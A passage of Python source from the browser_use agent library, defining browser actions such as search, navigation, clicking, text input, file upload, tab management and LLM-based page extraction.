# Collapse whitespace for readability
display_text = ' '.join(text.split())
if len(display_text) > 120:
display_text = display_text[:120] + '...'
parts.append(f'"{display_text}"')
if attrs:
attr_strs = [f'{k}="{v}"' for k, v in attrs.items()]
parts.append('{' + ', '.join(attr_strs) + '}')
parts.append(f'({children} children)')
lines.append(' '.join(parts))
if showing < total:
lines.append(f'\nShowing {showing} of {total} total elements. Increase max_results to see more.')
return '\n'.join(lines)
def _is_autocomplete_field(node: EnhancedDOMTreeNode) -> bool:
attrs = node.attributes or {}
if attrs.get('role') == 'combobox':
return True
aria_ac = attrs.get('aria-autocomplete', '')
if aria_ac and aria_ac != 'none':
return True
if attrs.get('list'):
return True
haspopup = attrs.get('aria-haspopup', '')
if haspopup and haspopup != 'false' and (attrs.get('aria-controls') or attrs.get('aria-owns')):
return True
return False
class Tools(Generic[Context]):
def __init__(
self,
exclude_actions: list[str] | None = None,
output_model: type[T] | None = None,
display_files_in_done_text: bool = True,
):
self.registry = Registry[Context](exclude_actions if exclude_actions is not None else [])
self.display_files_in_done_text = display_files_in_done_text
self._output_model: type[BaseModel] | None = output_model
self._coordinate_clicking_enabled: bool = False
"""Register all default browser actions"""
self._register_done_action(output_model)
# Basic Navigation Actions
@self.registry.action(
'',
param_model=SearchAction,
terminates_sequence=True,
)
async def search(params: SearchAction, browser_session: BrowserSession):
import urllib.parse
# Encode query for URL safety
encoded_query = urllib.parse.quote_plus(params.query)
# Build search URL based on search engine
search_engines = {
'duckduckgo': f'https://duckduckgo.com/?q={encoded_query}',
'google': f'https://www.google.com/search?q={encoded_query}&udm=14',
'bing': f'https://www.bing.com/search?q={encoded_query}',
}
if params.engine.lower() not in search_engines:
return ActionResult(error=f'Unsupported search engine: {params.engine}. Options: duckduckgo, google, bing')
search_url = search_engines[params.engine.lower()]
# Simple tab logic: use current tab by default
use_new_tab = False
# Dispatch navigation event
try:
event = browser_session.event_bus.dispatch(
NavigateToUrlEvent(
url=search_url,
new_tab=use_new_tab,
)
)
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
memory = f"Searched {params.engine.title()} for '{params.query}'"
msg = f'🔍 {memory}'
logger.info(msg)
return ActionResult(extracted_content=memory, long_term_memory=memory)
except Exception as e:
logger.error(f'Failed to search {params.engine}: {e}')
return ActionResult(error=f'Failed to search {params.engine} for "{params.query}": {str(e)}')
@self.registry.action(
'',
param_model=NavigateAction,
terminates_sequence=True,
)
async def navigate(params: NavigateAction, browser_session: BrowserSession):
try:
# Dispatch navigation event
event = browser_session.event_bus.dispatch(NavigateToUrlEvent(url=params.url, new_tab=params.new_tab))
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
# Health check: detect empty DOM for http/https pages and retry once
if not params.new_tab:
state = await browser_session.get_browser_state_summary(include_screenshot=False)
url_is_http = state.url.lower().startswith(('http://', 'https://'))
if url_is_http and state.dom_state._root is None:
browser_session.logger.warning(
f'⚠️ Empty DOM detected after navigation to {params.url}, waiting 3s and rechecking...'
)
await asyncio.sleep(3.0)
state = await browser_session.get_browser_state_summary(include_screenshot=False)
if state.url.lower().startswith(('http://', 'https://')) and state.dom_state._root is None:
return ActionResult(
error=f'Page loaded but returned empty content for {params.url}. '
f'The page may require JavaScript that failed to render, use anti-bot measures, '
f'or have a connection issue (e.g. tunnel/proxy error). Try a different URL or approach.'
)
if params.new_tab:
memory = f'Opened new tab with URL {params.url}'
msg = f'🔗 Opened new tab with url {params.url}'
else:
memory = f'Navigated to {params.url}'
msg = f'🔗 {memory}'
logger.info(msg)
return ActionResult(extracted_content=msg, long_term_memory=memory)
except Exception as e:
error_msg = str(e)
# Always log the actual error first for debugging
browser_session.logger.error(f'❌ Navigation failed: {error_msg}')
# Check if it's specifically a RuntimeError about CDP client
if isinstance(e, RuntimeError) and 'CDP client not initialized' in error_msg:
browser_session.logger.error('❌ Browser connection failed - CDP client not properly initialized')
return ActionResult(error=f'Browser connection error: {error_msg}')
# Check for network-related errors
elif any(
err in error_msg
for err in [
'ERR_NAME_NOT_RESOLVED',
'ERR_INTERNET_DISCONNECTED',
'ERR_CONNECTION_REFUSED',
'ERR_TIMED_OUT',
'ERR_TUNNEL_CONNECTION_FAILED',
'net::',
]
):
site_unavailable_msg = f'Navigation failed - site unavailable: {params.url}'
browser_session.logger.warning(f'⚠️ {site_unavailable_msg} - {error_msg}')
return ActionResult(error=site_unavailable_msg)
else:
# Return error in ActionResult instead of re-raising
return ActionResult(error=f'Navigation failed: {str(e)}')
@self.registry.action('Go back', param_model=NoParamsAction, terminates_sequence=True)
async def go_back(_: NoParamsAction, browser_session: BrowserSession):
try:
event = browser_session.event_bus.dispatch(GoBackEvent())
await event
memory = 'Navigated back'
msg = f'🔙 {memory}'
logger.info(msg)
return ActionResult(extracted_content=memory)
except Exception as e:
logger.error(f'Failed to dispatch GoBackEvent: {type(e).__name__}: {e}')
error_msg = f'Failed to go back: {str(e)}'
return ActionResult(error=error_msg)
@self.registry.action('Wait for x seconds.')
async def wait(seconds: int = 3):
# Cap wait time at maximum 30 seconds
# Reduce the wait time by 3 seconds to account for the llm call which takes at least 3 seconds
# So if the model decides to wait for 5 seconds, the llm call took at least 3 seconds, so we only need to wait for 2 seconds
# Note by Mert: the above doesnt make sense because we do the LLM call right after this or this could be followed by another action after which we would like to wait
# so I revert this.
actual_seconds = min(max(seconds - 1, 0), 30)
memory = f'Waited for {seconds} seconds'
logger.info(f'🕒 waited for {seconds} second{"" if seconds == 1 else "s"}')
await asyncio.sleep(actual_seconds)
return ActionResult(extracted_content=memory, long_term_memory=memory)
# Helper function for coordinate conversion
def _convert_llm_coordinates_to_viewport(llm_x: int, llm_y: int, browser_session: BrowserSession) -> tuple[int, int]:
if browser_session.llm_screenshot_size and browser_session._original_viewport_size:
original_width, original_height = browser_session._original_viewport_size
llm_width, llm_height = browser_session.llm_screenshot_size
# Convert coordinates using fractions
actual_x = int((llm_x / llm_width) * original_width)
actual_y = int((llm_y / llm_height) * original_height)
logger.info(
f'🔄 Converting coordinates: LLM ({llm_x}, {llm_y}) @ {llm_width}x{llm_height} '
f'→ Viewport ({actual_x}, {actual_y}) @ {original_width}x{original_height}'
)
return actual_x, actual_y
return llm_x, llm_y
# Element Interaction Actions
async def _detect_new_tab_opened(
    browser_session: BrowserSession,
    tabs_before: set[str],
) -> str:
    """Return a hint sentence if a new tab appeared since ``tabs_before``.

    Edge cases:
    - Only the FIRST new tab is reported even if several opened at once.
    - Returns '' both when no new tab was found AND when tab enumeration
      fails for any reason — errors are deliberately swallowed so tab
      detection can never break the click action that calls this helper.
    """
    try:
        # Brief delay to allow CDP Target.attachedToTarget events to propagate
        # and be processed by SessionManager._handle_target_attached
        await asyncio.sleep(0.05)
        tabs_after = await browser_session.get_tabs()
        new_tabs = [t for t in tabs_after if t.target_id not in tabs_before]
        if new_tabs:
            # tab_id shown to the agent is the last 4 chars of the CDP target_id
            new_tab_id = new_tabs[0].target_id[-4:]
            return f'. Note: This opened a new tab (tab_id: {new_tab_id}) - switch to it if you need to interact with the new page.'
    except Exception:
        # Best-effort only: never let detection failure affect the caller
        pass
    return ''
async def _click_by_coordinate(params: ClickElementAction, browser_session: BrowserSession) -> ActionResult:
    """Click at an absolute coordinate, rescaling from LLM screenshot space.

    Edge cases:
    - Both coordinate_x and coordinate_y must be provided; otherwise an
      error ActionResult is returned without touching the browser.
    - Coordinates are converted from the LLM screenshot size to the real
      viewport size when screenshot resizing is active.
    - The click is dispatched with force=True, so validation errors are
      normally bypassed; a 'validation_error' in the result metadata is
      still checked defensively.
    - A newly opened tab is detected and appended to the result memory.
    - BrowserError is translated via handle_browser_error(); any other
      exception is returned as an ActionResult error (never raised).
    """
    # Ensure coordinates are provided (type safety)
    if params.coordinate_x is None or params.coordinate_y is None:
        return ActionResult(error='Both coordinate_x and coordinate_y must be provided')
    try:
        # Convert coordinates from LLM size to original viewport size if resizing was used
        actual_x, actual_y = _convert_llm_coordinates_to_viewport(
            params.coordinate_x, params.coordinate_y, browser_session
        )
        # Capture tab IDs before click to detect new tabs
        tabs_before = {t.target_id for t in await browser_session.get_tabs()}
        # Highlight the coordinate being clicked (truly non-blocking)
        asyncio.create_task(browser_session.highlight_coordinate_click(actual_x, actual_y))
        # Dispatch ClickCoordinateEvent - handler will check for safety and click
        event = browser_session.event_bus.dispatch(
            ClickCoordinateEvent(coordinate_x=actual_x, coordinate_y=actual_y, force=True)
        )
        await event
        # Wait for handler to complete and get any exception or metadata
        click_metadata = await event.event_result(raise_if_any=True, raise_if_none=False)
        # Check for validation errors (only happens when force=False)
        if isinstance(click_metadata, dict) and 'validation_error' in click_metadata:
            error_msg = click_metadata['validation_error']
            return ActionResult(error=error_msg)
        memory = f'Clicked on coordinate {params.coordinate_x}, {params.coordinate_y}'
        memory += await _detect_new_tab_opened(browser_session, tabs_before)
        logger.info(f'🖱️ {memory}')
        return ActionResult(
            extracted_content=memory,
            metadata={'click_x': actual_x, 'click_y': actual_y},
        )
    except BrowserError as e:
        return handle_browser_error(e)
    except Exception as e:
        # Include the exception detail (previously dropped) for debuggability,
        # consistent with _click_by_index's error message.
        error_msg = f'Failed to click at coordinates ({params.coordinate_x}, {params.coordinate_y}): {type(e).__name__}: {e}'
        return ActionResult(error=error_msg)
async def _click_by_index(
    params: ClickElementAction | ClickElementActionIndexOnly, browser_session: BrowserSession
) -> ActionResult:
    """Click the element registered under ``params.index`` in the selector map.

    Edge cases:
    - index 0 is rejected (asserted): it is reserved to mean "no interactive
      elements" and the agent should use wait()/refresh() instead.
    - A stale index (element no longer in the selector map) returns a
      non-error ActionResult advising the agent to refresh browser state.
    - Clicking a <select> is refused by the handler; as a shortcut this
      falls through to dropdown_options() so the agent immediately sees
      the available options instead of just an error.
    - A newly opened tab is detected and mentioned in the result memory.
    - BrowserError is translated via handle_browser_error(); any other
      exception becomes an ActionResult error (never raised).
    """
    assert params.index is not None
    try:
        assert params.index != 0, (
            'Cannot click on element with index 0. If there are no interactive elements use wait(), refresh(), etc. to troubleshoot'
        )
        # Look up the node from the selector map
        node = await browser_session.get_element_by_index(params.index)
        if node is None:
            msg = f'Element index {params.index} not available - page may have changed. Try refreshing browser state.'
            logger.warning(f'⚠️ {msg}')
            return ActionResult(extracted_content=msg)
        # Get description of clicked element
        element_desc = get_click_description(node)
        # Capture tab IDs before click to detect new tabs
        tabs_before = {t.target_id for t in await browser_session.get_tabs()}
        # Highlight the element being clicked (truly non-blocking)
        create_task_with_error_handling(
            browser_session.highlight_interaction_element(node), name='highlight_click_element', suppress_exceptions=True
        )
        event = browser_session.event_bus.dispatch(ClickElementEvent(node=node))
        await event
        # Wait for handler to complete and get any exception or metadata
        click_metadata = await event.event_result(raise_if_any=True, raise_if_none=False)
        # Check if result contains validation error (e.g., trying to click <select> or file input)
        if isinstance(click_metadata, dict) and 'validation_error' in click_metadata:
            error_msg = click_metadata['validation_error']
            # If it's a select element, try to get dropdown options as a helpful shortcut
            if 'Cannot click on <select> elements.' in error_msg:
                try:
                    return await dropdown_options(
                        params=GetDropdownOptionsAction(index=params.index), browser_session=browser_session
                    )
                except Exception as dropdown_error:
                    # Shortcut is best-effort; fall back to the original validation error
                    logger.debug(
                        f'Failed to get dropdown options as shortcut during click on dropdown: {type(dropdown_error).__name__}: {dropdown_error}'
                    )
            return ActionResult(error=error_msg)
        # Build memory with element info
        memory = f'Clicked {element_desc}'
        memory += await _detect_new_tab_opened(browser_session, tabs_before)
        logger.info(f'🖱️ {memory}')
        # Include click coordinates in metadata if available
        return ActionResult(
            extracted_content=memory,
            metadata=click_metadata if isinstance(click_metadata, dict) else None,
        )
    except BrowserError as e:
        return handle_browser_error(e)
    except Exception as e:
        error_msg = f'Failed to click element {params.index}: {str(e)}'
        return ActionResult(error=error_msg)
# Store click handlers on the instance so they can be re-registered later
# (e.g. when toggling between index-only and coordinate click modes)
self._click_by_index = _click_by_index
self._click_by_coordinate = _click_by_coordinate
# Register click action (index-only by default)
self._register_click_action()
@self.registry.action(
    'Input text into element by index.',
    param_model=InputTextAction,
)
async def input(
    params: InputTextAction,
    browser_session: BrowserSession,
    has_sensitive_data: bool = False,
    sensitive_data: dict[str, str | dict[str, str]] | None = None,
):
    """Type text into the element at ``params.index``.

    NOTE: the name intentionally shadows the builtin ``input`` — it is the
    registered action name the LLM calls, not used as a Python builtin here.

    Edge cases:
    - A stale index (element gone from selector map) returns a non-error
      ActionResult advising a browser-state refresh.
    - When has_sensitive_data is True, the typed value is never echoed into
      memory or logs; only the sensitive key name (if detected) is shown.
    - If the field's actual value after typing differs from the requested
      text (page reformatted/autocompleted it), a warning note is appended
      to the result — but only for non-sensitive input.
    - For JS-driven autocomplete fields (role=combobox / aria-autocomplete)
      a 0.4s delay is inserted so the suggestion dropdown can populate;
      native <datalist> fields get no delay.
    - BrowserError is translated via handle_browser_error(); any other
      exception becomes an ActionResult error (never raised).
    """
    # Look up the node from the selector map
    node = await browser_session.get_element_by_index(params.index)
    if node is None:
        msg = f'Element index {params.index} not available - page may have changed. Try refreshing browser state.'
        logger.warning(f'⚠️ {msg}')
        return ActionResult(extracted_content=msg)
    # Highlight the element being typed into (truly non-blocking)
    create_task_with_error_handling(
        browser_session.highlight_interaction_element(node), name='highlight_type_element', suppress_exceptions=True
    )
    # Dispatch type text event with node
    try:
        # Detect which sensitive key is being used
        sensitive_key_name = None
        if has_sensitive_data and sensitive_data:
            sensitive_key_name = _detect_sensitive_key_name(params.text, sensitive_data)
        event = browser_session.event_bus.dispatch(
            TypeTextEvent(
                node=node,
                text=params.text,
                clear=params.clear,
                is_sensitive=has_sensitive_data,
                sensitive_key_name=sensitive_key_name,
            )
        )
        await event
        input_metadata = await event.event_result(raise_if_any=True, raise_if_none=False)
        # Create message with sensitive data handling (never echo secrets)
        if has_sensitive_data:
            if sensitive_key_name:
                msg = f'Typed {sensitive_key_name}'
                log_msg = f'Typed <{sensitive_key_name}>'
            else:
                msg = 'Typed sensitive data'
                log_msg = 'Typed <sensitive>'
        else:
            msg = f"Typed '{params.text}'"
            log_msg = f"Typed '{params.text}'"
        logger.debug(log_msg)
        # Check for value mismatch (non-sensitive only)
        actual_value = None
        if isinstance(input_metadata, dict):
            # pop so the mismatch detail doesn't leak into returned metadata
            actual_value = input_metadata.pop('actual_value', None)
        if not has_sensitive_data and actual_value is not None and actual_value != params.text:
            msg += f"\n⚠️ Note: the field's actual value '{actual_value}' differs from typed text '{params.text}'. The page may have reformatted or autocompleted your input."
        # Check for autocomplete/combobox field — add mechanical delay for dropdown
        if _is_autocomplete_field(node):
            msg += '\n💡 This is an autocomplete field. Wait for suggestions to appear, then click the correct suggestion instead of pressing Enter.'
            # Only delay for true JS-driven autocomplete (combobox / aria-autocomplete),
            # not native <datalist> or loose aria-haspopup which the browser handles instantly
            attrs = node.attributes or {}
            if attrs.get('role') == 'combobox' or (attrs.get('aria-autocomplete', '') not in ('', 'none')):
                await asyncio.sleep(0.4)  # let JS dropdown populate before next action
        # Include input coordinates in metadata if available
        return ActionResult(
            extracted_content=msg,
            long_term_memory=msg,
            metadata=input_metadata if isinstance(input_metadata, dict) else None,
        )
    except BrowserError as e:
        return handle_browser_error(e)
    except Exception as e:
        # Log the full error for debugging
        logger.error(f'Failed to dispatch TypeTextEvent: {type(e).__name__}: {e}')
        error_msg = f'Failed to type text into element {params.index}: {e}'
        return ActionResult(error=error_msg)
@self.registry.action(
    '',
    param_model=UploadFileAction,
)
async def upload_file(
    params: UploadFileAction, browser_session: BrowserSession, available_file_paths: list[str], file_system: FileSystem
):
    """Upload a file to a file-input element near ``params.index``.

    Path resolution order (edge cases):
    1. params.path must be in available_file_paths, OR
    2. in browser_session.downloaded_files (recent downloads), OR
    3. a file managed by the FileSystem service (bare filename resolved to
       the full path inside file_system.get_dir()), OR
    4. for REMOTE browsers only (is_local=False) any absolute
       remote-accessible path is allowed as-is.
    Otherwise an error is returned (or BrowserError raised on one branch).

    Local-browser checks: the file must exist and be non-empty (0 bytes is
    treated as a save failure).

    File-input discovery: searches the selected element, its descendants,
    then siblings, walking up to 3 ancestors; if nothing is found it falls
    back to the file input closest to the current scroll position. If the
    page has no file input at all, BrowserError is raised.
    """
    # Check if file is in available_file_paths (user-provided or downloaded files)
    # For remote browsers (is_local=False), we allow absolute remote paths even if not tracked locally
    if params.path not in available_file_paths:
        # Also check if it's a recently downloaded file that might not be in available_file_paths yet
        downloaded_files = browser_session.downloaded_files
        if params.path not in downloaded_files:
            # Finally, check if it's a file in the FileSystem service
            if file_system and file_system.get_dir():
                # Check if the file is actually managed by the FileSystem service
                # The path should be just the filename for FileSystem files
                file_obj = file_system.get_file(params.path)
                if file_obj:
                    # File is managed by FileSystem, construct the full path
                    file_system_path = str(file_system.get_dir() / params.path)
                    params = UploadFileAction(index=params.index, path=file_system_path)
                else:
                    # If browser is remote, allow passing a remote-accessible absolute path
                    if not browser_session.is_local:
                        pass
                    else:
                        msg = f'File path {params.path} is not available. To fix: The user must add this file path to the available_file_paths parameter when creating the Agent. Example: Agent(task="...", llm=llm, browser=browser, available_file_paths=["{params.path}"])'
                        logger.error(f'❌ {msg}')
                        return ActionResult(error=msg)
            else:
                # If browser is remote, allow passing a remote-accessible absolute path
                if not browser_session.is_local:
                    pass
                else:
                    # NOTE(review): this branch raises while the sibling branch
                    # above returns an ActionResult — intentional? confirm
                    msg = f'File path {params.path} is not available. To fix: The user must add this file path to the available_file_paths parameter when creating the Agent. Example: Agent(task="...", llm=llm, browser=browser, available_file_paths=["{params.path}"])'
                    raise BrowserError(message=msg, long_term_memory=msg)
    # For local browsers, ensure the file exists and has content
    if browser_session.is_local:
        if not os.path.exists(params.path):
            msg = f'File {params.path} does not exist'
            return ActionResult(error=msg)
        file_size = os.path.getsize(params.path)
        if file_size == 0:
            msg = f'File {params.path} is empty (0 bytes). The file may not have been saved correctly.'
            return ActionResult(error=msg)
    # Get the selector map to find the node
    selector_map = await browser_session.get_selector_map()
    if params.index not in selector_map:
        msg = f'Element with index {params.index} does not exist.'
        return ActionResult(error=msg)
    node = selector_map[params.index]
    # Helper function to find file input near the selected element
    def find_file_input_near_element(
        node: EnhancedDOMTreeNode, max_height: int = 3, max_descendant_depth: int = 3
    ) -> EnhancedDOMTreeNode | None:
        """Search node, its descendants, then siblings, walking up at most
        ``max_height`` ancestors; descendant search is depth-limited."""
        def find_file_input_in_descendants(n: EnhancedDOMTreeNode, depth: int) -> EnhancedDOMTreeNode | None:
            # Depth-limited DFS; depth < 0 terminates the recursion
            if depth < 0:
                return None
            if browser_session.is_file_input(n):
                return n
            for child in n.children_nodes or []:
                result = find_file_input_in_descendants(child, depth - 1)
                if result:
                    return result
            return None
        current = node
        for _ in range(max_height + 1):
            # Check the current node itself
            if browser_session.is_file_input(current):
                return current
            # Check all descendants of the current node
            result = find_file_input_in_descendants(current, max_descendant_depth)
            if result:
                return result
            # Check all siblings and their descendants
            if current.parent_node:
                for sibling in current.parent_node.children_nodes or []:
                    if sibling is current:
                        continue
                    if browser_session.is_file_input(sibling):
                        return sibling
                    result = find_file_input_in_descendants(sibling, max_descendant_depth)
                    if result:
                        return result
            current = current.parent_node
            # Reached the root without finding anything
            if not current:
                break
        return None
    # Try to find a file input element near the selected element
    file_input_node = find_file_input_near_element(node)
    # Highlight the file input element if found (truly non-blocking)
    if file_input_node:
        create_task_with_error_handling(
            browser_session.highlight_interaction_element(file_input_node),
            name='highlight_file_input',
            suppress_exceptions=True,
        )
    # If not found near the selected element, fallback to finding the closest file input to current scroll position
    if file_input_node is None:
        logger.info(
            f'No file upload element found near index {params.index}, searching for closest file input to scroll position'
        )
        # Get current scroll position
        cdp_session = await browser_session.get_or_create_cdp_session()
        try:
            scroll_info = await cdp_session.cdp_client.send.Runtime.evaluate(
                params={'expression': 'window.scrollY || window.pageYOffset || 0'}, session_id=cdp_session.session_id
            )
            current_scroll_y = scroll_info.get('result', {}).get('value', 0)
        except Exception:
            # Scroll position is only a heuristic — default to top of page
            current_scroll_y = 0
        # Find all file inputs in the selector map and pick the closest one to scroll position
        closest_file_input = None
        min_distance = float('inf')
        for idx, element in selector_map.items():
            if browser_session.is_file_input(element):
                # Get element's Y position (skip elements with no known position)
                if element.absolute_position:
                    element_y = element.absolute_position.y
                    distance = abs(element_y - current_scroll_y)
                    if distance < min_distance:
                        min_distance = distance
                        closest_file_input = element
        if closest_file_input:
            file_input_node = closest_file_input
            logger.info(f'Found file input closest to scroll position (distance: {min_distance}px)')
            # Highlight the fallback file input element (truly non-blocking)
            create_task_with_error_handling(
                browser_session.highlight_interaction_element(file_input_node),
                name='highlight_file_input_fallback',
                suppress_exceptions=True,
            )
        else:
            msg = 'No file upload element found on the page'
            logger.error(msg)
            raise BrowserError(msg)
    # TODO: figure out why this fails sometimes + add fallback hail mary, just look for any file input on page
    # Dispatch upload file event with the file input node
    try:
        event = browser_session.event_bus.dispatch(UploadFileEvent(node=file_input_node, file_path=params.path))
        await event
        await event.event_result(raise_if_any=True, raise_if_none=False)
        msg = f'Successfully uploaded file to index {params.index}'
        logger.info(f'📁 {msg}')
        return ActionResult(
            extracted_content=msg,
            long_term_memory=f'Uploaded file {params.path} to element {params.index}',
        )
    except Exception as e:
        logger.error(f'Failed to upload file: {e}')
        raise BrowserError(f'Failed to upload file: {e}')
# Tab Management Actions
@self.registry.action(
    'Switch to another open tab by tab_id. Tab IDs are shown in browser state tabs list (last 4 chars of target_id). Use when you need to work with content in a different tab.',
    param_model=SwitchTabAction,
    terminates_sequence=True,
)
async def switch(params: SwitchTabAction, browser_session: BrowserSession):
    """Switch the active tab by its short (last-4-chars) tab_id.

    Edge cases:
    - The event result is read with raise_if_any=False, so handler errors
      do not raise; if no target id comes back, the memory falls back to
      the requested tab_id.
    - Any exception (e.g. unknown tab_id) is caught and reported as an
      'Attempted to switch' memory — this action never raises and never
      returns an error ActionResult.
    """
    # Simple switch tab logic
    try:
        target_id = await browser_session.get_target_id_from_tab_id(params.tab_id)
        event = browser_session.event_bus.dispatch(SwitchTabEvent(target_id=target_id))
        await event
        new_target_id = await event.event_result(raise_if_any=False, raise_if_none=False)  # Don't raise on errors
        if new_target_id:
            memory = f'Switched to tab #{new_target_id[-4:]}'
        else:
            memory = f'Switched to tab #{params.tab_id}'
        logger.info(f'🔄 {memory}')
        return ActionResult(extracted_content=memory, long_term_memory=memory)
    except Exception as e:
        # Best-effort: report the attempt rather than failing the step
        logger.warning(f'Tab switch may have failed: {e}')
        memory = f'Attempted to switch to tab #{params.tab_id}'
        return ActionResult(extracted_content=memory, long_term_memory=memory)
@self.registry.action(
    'Close a tab by tab_id. Tab IDs are shown in browser state tabs list (last 4 chars of target_id). Use to clean up tabs you no longer need.',
    param_model=CloseTabAction,
)
async def close(params: CloseTabAction, browser_session: BrowserSession):
    """Close a tab by its short (last-4-chars) tab_id.

    Edge cases:
    - Stale/already-closed target IDs are tolerated: the event result is
      read with raise_if_any=False, and any lookup/dispatch exception is
      caught and reported as 'already closed or invalid'.
    - This action never raises and never returns an error ActionResult.
    """
    # Simple close tab logic
    try:
        target_id = await browser_session.get_target_id_from_tab_id(params.tab_id)
        # Dispatch close tab event - handle stale target IDs gracefully
        event = browser_session.event_bus.dispatch(CloseTabEvent(target_id=target_id))
        await event
        await event.event_result(raise_if_any=False, raise_if_none=False)  # Don't raise on errors
        memory = f'Closed tab #{params.tab_id}'
        logger.info(f'🗑️ {memory}')
        return ActionResult(
            extracted_content=memory,
            long_term_memory=memory,
        )
    except Exception as e:
        # Handle stale target IDs gracefully
        logger.warning(f'Tab {params.tab_id} may already be closed: {e}')
        memory = f'Tab #{params.tab_id} closed (was already closed or invalid)'
        return ActionResult(
            extracted_content=memory,
            long_term_memory=memory,
        )
@self.registry.action(
    """LLM extracts structured data from page markdown. Use when: on right page, know what to extract, haven't called before on same page+query. Can't get interactive elements. Set extract_links=True for URLs. Use start_from_char if previous extraction was truncated to extract data further down the page. When paginating across pages, pass already_collected with item identifiers (names/URLs) from prior pages to avoid duplicates.""",
    param_model=ExtractAction,
)
async def extract(
    params: ExtractAction,
    browser_session: BrowserSession,
    page_extraction_llm: BaseChatModel,
    file_system: FileSystem,
    extraction_schema: dict | None = None,
):
    """Extract data from the current page's filtered markdown with an LLM.

    Edge cases:
    - ``params`` may be a dict OR a pydantic model; both access styles are
      handled for every field.
    - start_from_char beyond the content length returns an error quoting
      the actual filtered length so the agent can retry with a valid offset.
    - Content is chunked structurally at MAX_CHAR_LIMIT (100k chars); when
      truncated, next_start_char in content_stats tells the agent where to
      continue, and table-header overlap is prepended to continuation chunks.
    - An invalid output_schema logs a warning and falls back to free-text
      extraction rather than failing.
    - already_collected identifiers are capped to the first 100 in the prompt.
    - Surrogate characters are sanitized from content and query to prevent
      UTF-8 encoding errors.
    - Results under 10,000 chars stay in memory verbatim; longer results are
      written to the file system and included in context only once.
    - LLM calls are bounded by a 120s timeout; extraction failures are
      re-raised as RuntimeError.
    """
    # Constants
    MAX_CHAR_LIMIT = 100000
    # params may arrive as a raw dict or a pydantic model — support both
    query = params['query'] if isinstance(params, dict) else params.query
    extract_links = params['extract_links'] if isinstance(params, dict) else params.extract_links
    start_from_char = params['start_from_char'] if isinstance(params, dict) else params.start_from_char
    output_schema: dict | None = params.get('output_schema') if isinstance(params, dict) else params.output_schema
    already_collected: list[str] = (
        params.get('already_collected', []) if isinstance(params, dict) else params.already_collected
    )
    # If the LLM didn't provide an output_schema, use the agent-injected extraction_schema
    if output_schema is None and extraction_schema is not None:
        output_schema = extraction_schema
    # Attempt to convert output_schema to a pydantic model upfront; fall back to free-text on failure
    structured_model: type[BaseModel] | None = None
    if output_schema is not None:
        try:
            from browser_use.tools.extraction.schema_utils import schema_dict_to_pydantic_model
            structured_model = schema_dict_to_pydantic_model(output_schema)
        except (ValueError, TypeError) as exc:
            logger.warning(f'Invalid output_schema, falling back to free-text extraction: {exc}')
            output_schema = None
    # Extract clean markdown using the unified method
    try:
        from browser_use.dom.markdown_extractor import extract_clean_markdown
        content, content_stats = await extract_clean_markdown(
            browser_session=browser_session, extract_links=extract_links
        )
    except Exception as e:
        raise RuntimeError(f'Could not extract clean markdown: {type(e).__name__}')
    # Original content length for processing
    final_filtered_length = content_stats['final_filtered_chars']
    # Structure-aware chunking replaces naive char-based truncation
    from browser_use.dom.markdown_extractor import chunk_markdown_by_structure
    chunks = chunk_markdown_by_structure(content, max_chunk_chars=MAX_CHAR_LIMIT, start_from_char=start_from_char)
    if not chunks:
        # start_from_char past end of content — tell the agent the real length
        return ActionResult(
            error=f'start_from_char ({start_from_char}) exceeds content length {final_filtered_length} characters.'
        )
    chunk = chunks[0]
    content = chunk.content
    truncated = chunk.has_more
    # Prepend overlap context for continuation chunks (e.g. table headers)
    if chunk.overlap_prefix:
        content = chunk.overlap_prefix + '\n' + content
    if start_from_char > 0:
        content_stats['started_from_char'] = start_from_char
    if truncated:
        content_stats['truncated_at_char'] = chunk.char_offset_end
        content_stats['next_start_char'] = chunk.char_offset_end
        content_stats['chunk_index'] = chunk.chunk_index
        content_stats['total_chunks'] = chunk.total_chunks
    # Add content statistics to the result
    original_html_length = content_stats['original_html_chars']
    initial_markdown_length = content_stats['initial_markdown_chars']
    chars_filtered = content_stats['filtered_chars_removed']
    stats_summary = f"""Content processed: {original_html_length:,} HTML chars → {initial_markdown_length:,} initial markdown → {final_filtered_length:,} filtered markdown"""
    if start_from_char > 0:
        stats_summary += f' (started from char {start_from_char:,})'
    if truncated:
        chunk_info = f'chunk {chunk.chunk_index + 1} of {chunk.total_chunks}, '
        stats_summary += f' → {len(content):,} final chars ({chunk_info}use start_from_char={content_stats["next_start_char"]} to continue)'
    elif chars_filtered > 0:
        stats_summary += f' (filtered {chars_filtered:,} chars of noise)'
    # Sanitize surrogates from content to prevent UTF-8 encoding errors
    content = sanitize_surrogates(content)
    query = sanitize_surrogates(query)
    # --- Structured extraction path ---
    if structured_model is not None:
        assert output_schema is not None
        system_prompt = """
You are an expert at extracting structured data from the markdown of a webpage.
<input>
You will be given a query, a JSON Schema, and the markdown of a webpage that has been filtered to remove noise and advertising content.
</input>
<instructions>
- Extract ONLY information present in the webpage. Do not guess or fabricate values.
- Your response MUST conform to the provided JSON Schema exactly.
- If a required field's value cannot be found on the page, use null (if the schema allows it) or an empty string / empty array as appropriate.
- If the content was truncated, extract what is available from the visible portion.
- If <already_collected> items are provided, skip any items whose name/title/URL matches those listed — do not include duplicates.
</instructions>
""".strip()
        schema_json = json.dumps(output_schema, indent=2)
        already_collected_section = ''
        if already_collected:
            # Cap prompt size: only the first 100 identifiers are listed
            items_str = '\n'.join(f'- {item}' for item in already_collected[:100])
            already_collected_section = f'\n\n<already_collected>\nSkip items whose name/title/URL matches any of these already-collected identifiers:\n{items_str}\n</already_collected>'
        prompt = (
            f'<query>\n{query}\n</query>\n\n'
            f'<output_schema>\n{schema_json}\n</output_schema>\n\n'
            f'<content_stats>\n{stats_summary}\n</content_stats>\n\n'
            f'<webpage_content>\n{content}\n</webpage_content>' + already_collected_section
        )
        try:
            response = await asyncio.wait_for(
                page_extraction_llm.ainvoke(
                    [SystemMessage(content=system_prompt), UserMessage(content=prompt)],
                    output_format=structured_model,
                ),
                timeout=120.0,
            )
            # response.completion is a pydantic model instance
            result_data: dict = response.completion.model_dump(mode='json')  # type: ignore[union-attr]
            result_json = json.dumps(result_data)
            current_url = await browser_session.get_current_page_url()
            extracted_content = f'<url>\n{current_url}\n</url>\n<query>\n{query}\n</query>\n<structured_result>\n{result_json}\n</structured_result>'
            from browser_use.tools.extraction.views import ExtractionResult
            extraction_meta = ExtractionResult(
                data=result_data,
                schema_used=output_schema,
                is_partial=truncated,
                source_url=current_url,
                content_stats=content_stats,
            )
            # Simple memory handling: large results go to a file, not memory
